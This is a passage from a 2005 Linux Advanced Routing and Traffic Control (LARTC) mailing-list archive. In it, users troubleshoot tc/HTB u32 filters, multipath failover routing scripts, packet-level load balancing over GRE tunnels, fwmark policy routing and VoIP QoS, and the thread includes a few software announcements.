tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit
tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit
tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit
tc qdisc add dev ppp0 parent 1:20 handle 20: prio
tc qdisc add dev ppp0 parent 1:21 handle 21: prio
tc qdisc add dev ppp0 parent 1:22 handle 22: prio
tc qdisc add dev ppp0 parent 1:23 handle 23: prio

but when i try to set up the filters :

tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowid 1:23
tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22
tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowid 1:21

says :

RTNETLINK answers: Invalid argument

---------------------------------------------------------------------

my system :

router:~# tc qdisc show dev ppp0
qdisc prio 23: bands 3 priomap  1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
qdisc prio 22: bands 3 priomap  1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
qdisc prio 21: bands 3 priomap  1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
qdisc prio 20: bands 3 priomap  1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
qdisc htb 1: r2q 10 default 20 direct_packets_stat 0
router:~# tc class show dev ppp0
class prio 23:1 parent 23: [UNKNOWN]
class prio 23:2 parent 23: [UNKNOWN]
class prio 23:3 parent 23: [UNKNOWN]
class prio 22:1 parent 22: [UNKNOWN]
class prio 22:2 parent 22: [UNKNOWN]
class prio 22:3 parent 22: [UNKNOWN]
class prio 21:1 parent 21: [UNKNOWN]
class prio 21:2 parent 21: [UNKNOWN]
class prio 21:3 parent 21: [UNKNOWN]
class prio 20:1 parent 20: [UNKNOWN]
class prio 20:2 parent 20: [UNKNOWN]
class prio 20:3 parent 20: [UNKNOWN]
class htb 1:22 parent 1:1 leaf 22: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b
class htb 1:1 root rate 120Kbit ceil 120Kbit burst 1752b cburst 1752b
class htb 1:23 parent 1:1 leaf 23: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b
class htb 1:20 parent 1:1 leaf 20: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b
class htb 1:21 parent 1:1 leaf 21: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b
router:~#

i'm stuck. anybody knows what's going on.
thanks

From pankaj@toughguy.net Sun Feb 6 15:47:34 2005
From: pankaj@toughguy.net (Pankaj Agarwal)
Date: Sun, 6 Feb 2005 21:17:34 +0530
Subject: [LARTC] Urgent Help needed
Message-ID: <001c01c50c64$56990920$8d00150a@dreammac>

Hi,

There's some very silly mistake i've done in my configuration. I did by reading material on web. I'm enclosing my configuration script below. The problem is it's not routing the traffic from other interface in case the first interface is down....which should be the right case. Kindly please guide me what i can do to make it work..dynamically..
Thanks, Pankaj Agarwal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~The Script~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
#script written by Pankaj Agarwal
#defining location of ip binary
IP=/sbin/ip
#flushing all the IP/Routing cache
echo "removing old rules"
$IP rule del prio 50 table main
$IP rule del prio 201 from 61.11.104.0/24 table 201
$IP rule del prio 202 from 220.227.153.48/28 table 202
$IP rule del prio 222 table 222
echo "flushing tables"
$IP route flush table 201
$IP route flush table 202
$IP route flush table 222
echo "removing tables"
$IP route del table 201
$IP route del table 202
$IP route del table 222
#setting loop interface
$IP link set lo up
$IP addr flush dev lo
$IP addr add 127.0.0.1/8 brd + dev lo
#setting up the private device
$IP link set eth1 up
$IP addr flush dev eth1
$IP addr add 192.168.2.5/24 brd + dev eth1
$IP rule add prio 50 table main
$IP route del default table main
#setting up the public devices
$IP link set eth0 up
$IP addr flush dev eth0
$IP addr add 61.11.104.63/24 brd 61.11.104.255 dev eth0
$IP link set eth2 up
$IP addr flush dev eth2
$IP addr add 220.227.153.61/28 brd 220.227.153.63 dev eth2
#configuring route
$IP rule add prio 222 table 222
$IP route add default table 222 proto static nexthop via 61.11.104.1 dev eth0 weight 1 nexthop via 220.227.153.51 dev eth2 weight 3
#configuring for static routes for one connection
$IP rule add prio 201 from 61.11.104.0/24 table 201
$IP route add default via 61.11.104.1 dev eth0 src 61.11.104.63 proto static table 201
$IP route append prohibit default table 201 metric 1 proto static
$IP rule add prio 202 from 220.227.153.48/28 table 202
$IP route add default via 220.227.153.51 dev eth2 src 220.227.153.61 proto static table 202
$IP route append prohibit default table 202 metric 1 proto static
$IP route flush cache
while : ; do
  /bin/ping -c 1 220.227.153.51 >> /dev/null
  /bin/ping -c 1 61.11.104.1 >> /dev/null
  sleep 60
done
From George Alexandru Dragoi Sun Feb 6 17:55:33 2005 From: George Alexandru 
Dragoi (George Alexandru Dragoi) Date: Sun, 6 Feb 2005 19:55:33 +0200 Subject: [LARTC] problems with u32 fiter In-Reply-To: <200502061213.30560.listas@pablodanielrey.com.ar> References: <200502061213.30560.listas@pablodanielrey.com.ar> Message-ID: <3063e505020609554a08cc5d@mail.gmail.com> I had something similar too, lok here http://mailman.ds9a.nl/pipermail/lartc/2004q4/014444.html On Sun, 6 Feb 2005 12:13:30 +0000, listas@pablodanielrey.com.ar wrote: > hello to all > i'm trying to set a filter but doesn't want to work. > i've set ut the qdiscs and the classes like this : > > tc qdisc add dev ppp0 root handle 1: htb default 20 > tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit > tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit > tc qdisc add dev ppp0 parent 1:20 handle 20: prio > tc qdisc add dev ppp0 parent 1:21 handle 21: prio > tc qdisc add dev ppp0 parent 1:22 handle 22: prio > tc qdisc add dev ppp0 parent 1:23 handle 23: prio > > but when i try to set up the filters : > > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowid 1:23 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowid 1:21 > > says : > > RTNETLINK answers: Invalid argument > > --------------------------------------------------------------------- > > my system : > > router:~# tc qdisc show dev ppp0 > qdisc prio 23: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 22: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 21: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc prio 20: bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 > qdisc htb 1: r2q 10 default 20 
direct_packets_stat 0 > > router:~# tc class show dev ppp0 > class prio 23:1 parent 23: [UNKNOWN] > class prio 23:2 parent 23: [UNKNOWN] > class prio 23:3 parent 23: [UNKNOWN] > class prio 22:1 parent 22: [UNKNOWN] > class prio 22:2 parent 22: [UNKNOWN] > class prio 22:3 parent 22: [UNKNOWN] > class prio 21:1 parent 21: [UNKNOWN] > class prio 21:2 parent 21: [UNKNOWN] > class prio 21:3 parent 21: [UNKNOWN] > class prio 20:1 parent 20: [UNKNOWN] > class prio 20:2 parent 20: [UNKNOWN] > class prio 20:3 parent 20: [UNKNOWN] > class htb 1:22 parent 1:1 leaf 22: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:1 root rate 120Kbit ceil 120Kbit burst 1752b cburst 1752b > class htb 1:23 parent 1:1 leaf 23: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:20 parent 1:1 leaf 20: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > class htb 1:21 parent 1:1 leaf 21: prio 0 rate 30Kbit ceil 120Kbit burst 1637b cburst 1752b > router:~# > > i'm stuck. anybody knows what's going on. > thank's > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > -- Bla bla From Brouzouf brouz Sun Feb 6 19:52:13 2005 From: Brouzouf brouz (Brouzouf brouz) Date: Sun, 6 Feb 2005 10:52:13 -0900 Subject: [LARTC] TC GUI or graphs? Message-ID: <1b48ecdd05020611523253e121@mail.gmail.com> Deepak, i think you can look to this option too : http://sourceforge.net/projects/rcc/ The project is in developpment....but within 1 or 2 weeks i think it will be a good project....especially who linux network's owner. rgds, Erwan le Doeuff From fwang@ust.hk Mon Feb 7 14:21:45 2005 From: fwang@ust.hk (Feng WANG) Date: Mon, 7 Feb 2005 22:21:45 +0800 (HKT) Subject: [LARTC] Where to assign weights to different flows? Message-ID: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> Dear all, I'm really a newbie in using 'tc's class and qdisc concepts. 
I have a question, for example, when I want to use SFQ, how to assign different weights to different flows? I mean, is there a parameter to be set **in SFQ** to allow some flows to get more bandwidth than others? -- Best Regards, Franklin From listas@pablodanielrey.com.ar Mon Feb 7 11:46:50 2005 From: listas@pablodanielrey.com.ar (pablo daniel rey) Date: Mon, 7 Feb 2005 11:46:50 +0000 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> References: <3897.143.89.126.91.1107786105.squirrel@sqmail.ust.hk> Message-ID: <200502071146.50616.listas@pablodanielrey.com.ar> i think that what you are looking for is htb or prio From pankaj@toughguy.net Mon Feb 7 14:50:20 2005 From: pankaj@toughguy.net (Pankaj Agarwal) Date: Mon, 7 Feb 2005 20:20:20 +0530 Subject: [LARTC] please guide me ...with regard to multipath dynamic routing in case of link failure Message-ID: <003201c50d24$5e650670$8d00150a@dreammac> Hi, There's some very silly mistake i've done in my configuration. I did by reading material on web. I'm enclosing my configuration script below. The problem is it's not routing the traffic from other interface in case the first interface is down....which should be the right case. Kindly please guide me what i can do to make it work..dynamically.. Also there is a very common situation which many of you might have faced...the interface which is gateway for my device is my local router interface...and there's almost no chance of that's being down ever...How can one configure ip route to consider the ISP ends IP as the gateway when deciding on link status... 
Thanks, Pankaj Agarwal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~The Script~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
#script written by Pankaj Agarwal
#defining location of ip binary
IP=/sbin/ip
#flushing all the IP/Routing cache
echo "removing old rules"
$IP rule del prio 50 table main
$IP rule del prio 201 from 61.11.104.0/24 table 201
$IP rule del prio 202 from 220.227.153.48/28 table 202
$IP rule del prio 222 table 222
echo "flushing tables"
$IP route flush table 201
$IP route flush table 202
$IP route flush table 222
echo "removing tables"
$IP route del table 201
$IP route del table 202
$IP route del table 222
#setting loop interface
$IP link set lo up
$IP addr flush dev lo
$IP addr add 127.0.0.1/8 brd + dev lo
#setting up the private device
$IP link set eth1 up
$IP addr flush dev eth1
$IP addr add 192.168.2.5/24 brd + dev eth1
$IP rule add prio 50 table main
$IP route del default table main
#setting up the public devices
$IP link set eth0 up
$IP addr flush dev eth0
$IP addr add 61.11.104.63/24 brd 61.11.104.255 dev eth0
$IP link set eth2 up
$IP addr flush dev eth2
$IP addr add 220.227.153.61/28 brd 220.227.153.63 dev eth2
#configuring route
$IP rule add prio 222 table 222
$IP route add default table 222 proto static nexthop via 61.11.104.1 dev eth0 weight 1 nexthop via 220.227.153.51 dev eth2 weight 3
#configuring for static routes for one connection
$IP rule add prio 201 from 61.11.104.0/24 table 201
$IP route add default via 61.11.104.1 dev eth0 src 61.11.104.63 proto static table 201
$IP route append prohibit default table 201 metric 1 proto static
$IP rule add prio 202 from 220.227.153.48/28 table 202
$IP route add default via 220.227.153.51 dev eth2 src 220.227.153.61 proto static table 202
$IP route append prohibit default table 202 metric 1 proto static
$IP route flush cache
while : ; do
  /bin/ping -c 1 220.227.153.51 >> /dev/null
  /bin/ping -c 1 61.11.104.1 >> /dev/null
  sleep 60
done
From fwang@ust.hk Mon Feb 7 15:40:50 2005 From: fwang@ust.hk (Feng Wang) Date: 
Mon, 7 Feb 2005 23:40:50 +0800 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <200502071146.50616.listas@pablodanielrey.com.ar> Message-ID: <200502071540.j17FejxQ073624@mx3.ust.hk> But it seems that using htb, we are actually separating different classes the flows into different rates. And the flows are independent with each other, right? For example: by separating HTTP and FTP flows into two classes, we can assign different rates for them. But how about treating every HTTP flow differently, i.e. by assigning them different weights. BTW: Who knows how the weights are implemented in WFQ scheduling? How the weights are settled via 'tc' command? Thanks, Franklin -----Original Message----- From: lartc-admin@mailman.ds9a.nl [mailto:lartc-admin@mailman.ds9a.nl] On Behalf Of pablo daniel rey Sent: Monday, February 07, 2005 7:47 PM To: LARTC@mailman.ds9a.nl Subject: Re: [LARTC] Where to assign weights to different flows? i think that what you are looking for is htb or prio From listas@pablodanielrey.com.ar Mon Feb 7 15:37:14 2005 From: listas@pablodanielrey.com.ar (pablo daniel rey) Date: Mon, 7 Feb 2005 15:37:14 +0000 Subject: [LARTC] Where to assign weights to different flows? In-Reply-To: <200502071540.j17FejxQ073624@mx3.ust.hk> References: <200502071540.j17FejxQ073624@mx3.ust.hk> Message-ID: <200502071537.14434.listas@pablodanielrey.com.ar> if you want to distinguish http flows from each other you must filter them by some criteria. the sfq treats flows equally. it doesn't have any weights assigned to the flows. 
you can achieve what you want by setting up some filters and assigning them to the bands of the prio qdisc something like this : tc qdisc add dev ppp0 handle 1:0 root prio tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip dport 80 flowid 1:1 -- band 0 (high priority) http tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip dport 21 flowid 1:2 -- band 1 (medium priority) ftp you can even filter the traffic by ip tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip src 192.168.0.1 flowid 1:1 -- band 0 hope that helps From shemminger@osdl.org Mon Feb 7 19:00:42 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Mon, 7 Feb 2005 11:00:42 -0800 Subject: [LARTC] [ANNOUNCE] iproute2 - 2.6.10-050207 Message-ID: <20050207110042.166752a3@dxpl.pdx.osdl.net> Update to iproute2 utilities, mostly bug fixes. Only new functionality is integration of the ability to derive netem distribution table from experimental data; simple port from NISTnet. Download from http://developer.osdl.org/dev/iproute2/download/iproute2-050207.tar.gz [Mads Martin Joergensen] Don't mix address families when flushing [Jean-Marc Ranger] Need to call getline() with null for first usage Don't overwrite const arg [Stephen Hemminger] Add experimental distribution Validate classid is not too large to cause loss of bits. -- Stephen Hemminger From andy.furniss@dsl.pipex.com Tue Feb 8 00:35:48 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 00:35:48 +0000 Subject: [LARTC] multiple defaults In-Reply-To: <20050201154256.100e586c.mailinglists@lucassen.org> References: <20050201154256.100e586c.mailinglists@lucassen.org> Message-ID: <42080964.9090407@dsl.pipex.com> richard lucassen wrote: > I have 1 100MB NIC with two 2MB-subnets trough a router behind it. 
I'd > like to create multiple default classes: > > 1: + > |\_ 1:10 default, ceiling 100000kbit, rate 96000kbit > | > |\_ 1:11 ceiling 2048kbit, rate 2048kbit > | | > | |\_1:110 ceiling 2048kbit, rate 1536kbit > | \_1:111 ceiling 2048kbit, rate 512kbit (default subnet1) > | > \_ 1:12 ceiling 2048kbit, rate 2048kbit > | > |\_1:120 ceiling 2048kbit, rate 1536kbit > \_1:121 ceiling 2048kbit, rate 512kbit (default subnet2) > > I want to use 1:110 for subnet1 sport 3389 > I want to use 1:111 for subnet1 (the rest) > I want to use 1:120 for subnet2 sport 3389 > I want to use 1:121 for subnet2 (the rest) > > When selecting > > u32 match ip dst 10.106.18.0/24 \ > match ip protocol 6 0xff \ > match ip sport 3389 0xffff \ > flowid 1:120 > > u32 match ip dst 10.106.18.0/24 \ > flowid 1:121 > > All traffic goes to 1:121. The first filter for port 3389 is ok and > works. What am I doing wrong? I'd rather do not use fw selectors. Or > should I solve this problem another way? > > Richard. > Does it work if you use the prio parameter on the tc filters with 1 for 1:120 rule and 2 for 1.121? Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 00:58:21 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 00:58:21 +0000 Subject: [LARTC] Packet Level Load Balance inbound/outbound success with nth and route In-Reply-To: References: Message-ID: <42080EAD.9020402@dsl.pipex.com> Joe Nuts wrote: > First of all, I'd like to thank Andy Furniss for his direction and for > helping me get a working example up and running. > > For the following set up to work, you will need a linux computer at > the ISP (server), a linux computer at the client location (client), > and some a public range of IP's you plan to send down to your client. 
> > (as this configuration involves patching the linux kernel, I assume > you have already downloaded it, and have previously compiled a kernel) > steps to set up the linux computers are ) > make sure both computers have forwarding allowed (i do this with a > 'net.ipv4.ip_forward = 1' line in my /etc/sysctl.conf) > download iptables source, and patch-o-matic files from netfilter.org > unzip those files. run the patch-o-matic script. when you get to the > 'nth' and 'ROUTE' packages, select Y. > then, in the kernel config, under networking options, under netfilter > configuration, under iptables support, select nth, and under packet > mangling, select ROUTE. > compile the kernel, reboot with new kernel. > compile iptables, make && make install. > even after running make install, on my system, the two iptables > libraries didnt make it to /lib/iptables, so i had to copy them > manually. (copy libipt_nth.so and libipt_ROUTE.so from the iptables > source to /lib/iptables) > > now, I use GRE tunnels from the server to the client to send inbound > traffic, I assume you can use any kind of tunnel, just make sure > support for whatever you want to use is installed in to the kernel. 
> > for the sake of the example, IP's will be defined as follows : > Local IP at client : 66.81.23.1 (eth0) > DSL #1 at client : 64.20.12.46 (eth1) (64.20.12.45 is gateway) > DSL #2 at client : 64.20.12.50 (eth2) (64.20.12.49 is gateway) > > Public IP of server : 66.80.22.30 > Public IP Range sent to client : 66.81.23.0/24 > > the tunnels need to be set up on both the client and the server > --server-- > ip tunnel add client_tun1 mode gre remote 66.20.12.46 local 66.80.22.30 ttl 255 > ip tunnel add client_tun2 mode gre remote 66.20.12.50 local 66.80.22.30 ttl 255 > ip link set client_tun1 up > ip link set client_tun2 up > ip addr add 172.16.0.1/30 dev client_tun1 > ip addr add 172.16.0.5/30 dev client_tun2 > --client-- > ip tunnel add client_tun1 mode gre remote 66.80.22.30 local 66.20.12.46 ttl 255 > ip tunnel add client_tun2 mode gre remote 66.80.22.30 local 66.20.12.50 ttl 255 > ip link set client_tun1 up > ip link set client_tun2 up > ip addr add 172.16.0.2/30 dev client_tun1 > ip addr add 172.16.0.6/30 dev client_tun2 > > traffic outbound from the client doesnt need to go out the tunnel, but > it does need to be split > --client-- > iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 0 -j ROUTE --oif eth1 --gw 64.20.12.45 > iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 1 -j ROUTE --oif eth2 --gw 64.20.12.49 > > traffic inbound to the client will go to the server, and come to > client through the tunnel > --server-- > iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 0 -j ROUTE --oif client_tun1 --gw > 172.16.0.2 > iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth > --counter 0 --every 2 --packet 1 -j ROUTE --oif client_tun2 --gw > 172.16.0.6 > > > Of course this set up can be used to divide across more than two > links, just duplicate / modify the lines as needed. 
> Computers behind the client can now be given public IP's in that > range, set their gateway to 66.81.23.1, and they're up and running on > both lines. > > I hope this helps someone like me! > Sincerely, > Joe Comeaux Glad you got it working and thanks for posting the solution - all credit to you for that setup - all my suggestions were untested and a bit vague, you did all the work :-) Andy. From lists@wildgooses.com Tue Feb 8 01:09:44 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Tue, 08 Feb 2005 01:09:44 +0000 Subject: [LARTC] ANNOUNCE: LQL# 0.8.0 and LQL 0.8.0 In-Reply-To: <1107612940.4707.30.camel@ganymede> References: <1107612940.4707.30.camel@ganymede> Message-ID: <42081158.7000107@wildgooses.com> >That's right! Yes, yes, yes. You can now control the QoS features of the >Linux kernel from a high level language. LQL-Sharp provides a Mono (C#) >binding to all of the methods in the LQL library. > > Hmm, this looks very clever! Well done. I hope that this will stimulate some interesting new gui interfaces Good luck Ed W From andy.furniss@dsl.pipex.com Tue Feb 8 01:19:20 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:19:20 +0000 Subject: [LARTC] [Fwd: dummy as IMQ replacement] In-Reply-To: <41FDB22F.2060000@cardvn.net> References: <41FDB22F.2060000@cardvn.net> Message-ID: <42081398.4010400@dsl.pipex.com> Nguyen Dinh Nam wrote: > > The discussion about this carried on on netdev - http://marc.theaimsgroup.com/?l=linux-netdev&m=110712327422706&w=2 Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 01:34:00 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:34:00 +0000 Subject: [LARTC] PRIO / CBQ / HTB queue drop algorithm In-Reply-To: References: Message-ID: <42081708.9060402@dsl.pipex.com> rsenykoff@harrislogic.com wrote: > Hello all. > > I've been struggling to QoS VoIP at our site and have a successful > implementation at this point. 
Basically I had to set aside enough > bandwidth for VoIP by placing all other traffic behind an HTB (multiple > classes and queues behind it). Everything is fine. Here's the diagram: > > ------- > | eth | > ------- > | > -------- > | PRIO | > -------- > / \ > 1/ 2\ > --------- \ > | PFIFO | --------------------- > | VoIP | | Hier. Token Bucket | <-- throttled so it + VoIP won't > overrun > --------- ---------------------- the ethernet link (we know how > many > / 2| 3| \ phones we have so this is > possible > 1/ --------- --------- 4\ until you get into conferencing > etc) > --------- | PFIFO | | PFIFO | --------- > | PFIFO | | video | | inst. | | fair | > |citrix | --------- | msgr | | SFQ | > --------- --------- | bulk | > --------- > > I tried using CBQ and HTB as the higher level queues, but it seems that > with lending of traffic out, there is a delay (waiting for space in the > queue) where packets from VoIP will get dropped until there's space. I'm > guessing that the queues all use a basic tail-drop algorithm. > > Have I been doing something wrong? It sure would be cool to be able to > provide immediate bandwidth to VoIP (and other interactive applications) > while still letting those interactive traffic classes lend out bandwidth. > For example, an option on PRIO that lets you specify random drop, and what > bands to drop from. Thus, if a VoIP packet arrives and the queue is full, > rather than dropping the VoIP packet, randomly drop a packet from the bulk > traffic band of the PRIO queue. > > Any thoughts on this are very welcome. > > TIA! > -Ron S. HFSC may be the best solution, but there aren't many examples/much support for it yet. You can lend out unused interactive bandwidth with HTB and keep latency low, the trick is to give interactive class much more bandwidth (rate) than it needs and make bulk classes have low rates. Give interactive prio 0 which is highest priority. Andy. 
From andy.furniss@dsl.pipex.com Tue Feb 8 01:41:11 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:41:11 +0000 Subject: [LARTC] why fwmark don't work In-Reply-To: <004101c50a0a$ca7b5c00$02c0a8c0@sazhost> References: <004101c50a0a$ca7b5c00$02c0a8c0@sazhost> Message-ID: <420818B7.6030907@dsl.pipex.com> saz wrote: > Hi guys im trying to make a port redirecction using iproute together with iptables mangle option .. but for some strange reason is not working yet, I know i can do it in a diferent way, but the idea is using packet marking and redirect the packets with a rule. > > I have two computers PC1 and PC2 > > PC1: 192.168.0.1 this is the one connected to internet, and this machine make the redirection > PC2: 192.168.0.2 this is the smtp server > > So this is what i do in PC1: > > first i mark all the packets incoming for 25 port with "1": > > iptables -t mangle -A PREROUTING -p tcp --dport 25 -j MARK --set-mark 1 > > then i create a table called smtp: > > echo 200 smtp >> /etc/iproute2/rt_tables > > after that i set PC2 as default via for my smtp table: > > ip route add default via 192.168.0.2 table smtp > > and finally i make the rule for smtp table > > ip rule add fwmak 1 table smtp > > this would have to work, but is not redirecting nothing... > > i can see that is making the packets with 1 using the command iptables -t mangle -L PREROUTING -v but is not working, any one can help me? I am not sure, but I think your rules will just make smtp packets try to use 192.168.0.2 as a gateway rather than whatever your normal gateway is. I guess you really need to dnat them to 192.168.0.2. using iptables. Andy. 
From andy.furniss@dsl.pipex.com Tue Feb 8 01:48:34 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:48:34 +0000 Subject: [LARTC] How to route certain ports to other link In-Reply-To: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com> References: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com> Message-ID: <42081A72.4090605@dsl.pipex.com> root linux wrote: > Hi, > > I have one satellite link and one sdsl link. And, one > LAN link. > > My load balancing is working great with a iptables's > masquerading (no fw rules). > > Now, I need to route the following ports to my sdsl > link: - > > 20, 21, 22, 25, 80, 110, 143, and 443 > > Whereas the others go to my satellite link. > > Does anyone done this before? Not me - but have a look at policy routing in the HowTo or on http://www.linux-ip.net . Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 02:00:48 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 02:00:48 +0000 Subject: [LARTC] problems with u32 fiter In-Reply-To: <200502061213.30560.listas@pablodanielrey.com.ar> References: <200502061213.30560.listas@pablodanielrey.com.ar> Message-ID: <42081D50.40603@dsl.pipex.com> listas@pablodanielrey.com.ar wrote: > hello to all > i'm trying to set a filter but doesn't want to work. 
> i've set ut the qdiscs and the classes like this : > > tc qdisc add dev ppp0 root handle 1: htb default 20 > tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit > tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit > tc qdisc add dev ppp0 parent 1:20 handle 20: prio > tc qdisc add dev ppp0 parent 1:21 handle 21: prio > tc qdisc add dev ppp0 parent 1:22 handle 22: prio > tc qdisc add dev ppp0 parent 1:23 handle 23: prio > > but when i try to set up the filters : > > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowid 1:23 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowid 1:21 you need protocol ip before u32 eg. tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip src 192.168.0.2 flowid 1:23 Andy. From erwan le doeuff Tue Feb 8 02:13:00 2005 From: erwan le doeuff (erwan le doeuff) Date: Mon, 7 Feb 2005 17:13:00 -0900 Subject: [LARTC] TC GUI or graphs? Message-ID: <5028185c05020718133b833b26@mail.gmail.com> Here is a software for managing QoS (HTB) on multiple Linux system simultaneoulsy which a single remote GTK2 GUI. http://sourceforge.net/projects/rcc/ Read the INSTALL file before launching! I hope you will enjoy! Regards, Erwan Le Doeuff From lists@llondel.org Tue Feb 8 08:51:49 2005 From: lists@llondel.org (Mailing List Account) Date: Tue, 08 Feb 2005 08:51:49 +0000 Subject: [LARTC] Basic iproute configuration questions Message-ID: <42087DA5.7080105@llondel.org> I've managed to get myself confused with what is probably quite simple so if there's any definitive documentation then please give me pointers. 
I've read and tried the nano.txt document, that's what I've based my current setup on and it isn't working at the moment. I have two external links, a DSL link on eth1 and a cable link on eth2. Both acquire their addresses via DHCP. The local network lives on eth0 and has a static IP. The local network uses NAT to the outside world. I need to be able to load balance between the two external links for general outgoing traffic, force all outbound smtp traffic via eth1 and be able to handle inbound traffic to various servers (IMAP, web, SMTP, etc) on either link. My starting point is an old Pentium-2 box with three network cards, running a fully-patched version of FC2 (kernel 2.6.10-1.12_FC2). I had an old version that sort of worked on RH7.3 but it didn't do load balancing (in those days the DSL link was an ISDN link so it wasn't important) and handling inbound stuff was a crude hack[*] that I'm sure isn't the best way to do things. So, what do I need to do? Am I missing a required kernel patch or should the stock kernel be capable of what I want? Argh! Dave From Kenneth Kalmer Tue Feb 8 09:13:30 2005 From: Kenneth Kalmer (Kenneth Kalmer) Date: Tue, 8 Feb 2005 11:13:30 +0200 Subject: [LARTC] Shaping and forward Message-ID: Lartc readers I have a peculiar problem with shaping and firewalling. My tc rules work great, below is a smaller version: #Root tc qdisc del dev eth0 root tc qdisc add dev eth0 root handle 1: htb default 100 #Root Class tc class add dev eth0 parent 1: classid 1:1 htb rate 1024kbit quantum 20000 burst 15k #Class for each user tc class add dev eth0 parent 1:1 classid 1:2 htb rate 32kbit ceil 128kbit prio 0 quantum 20000 burst 15k tc class add dev eth0 parent 1:1 classid 1:3 htb rate 32kbit ceil 128kbit prio 0 quantum 20000 burst 15k ... # SFQ qdisc for each user class tc qdisc add dev eth0 parent 1:2 handle 12: sfq perturb 10 tc qdisc add dev eth0 parent 1:3 handle 13: sfq perturb 10 ... 
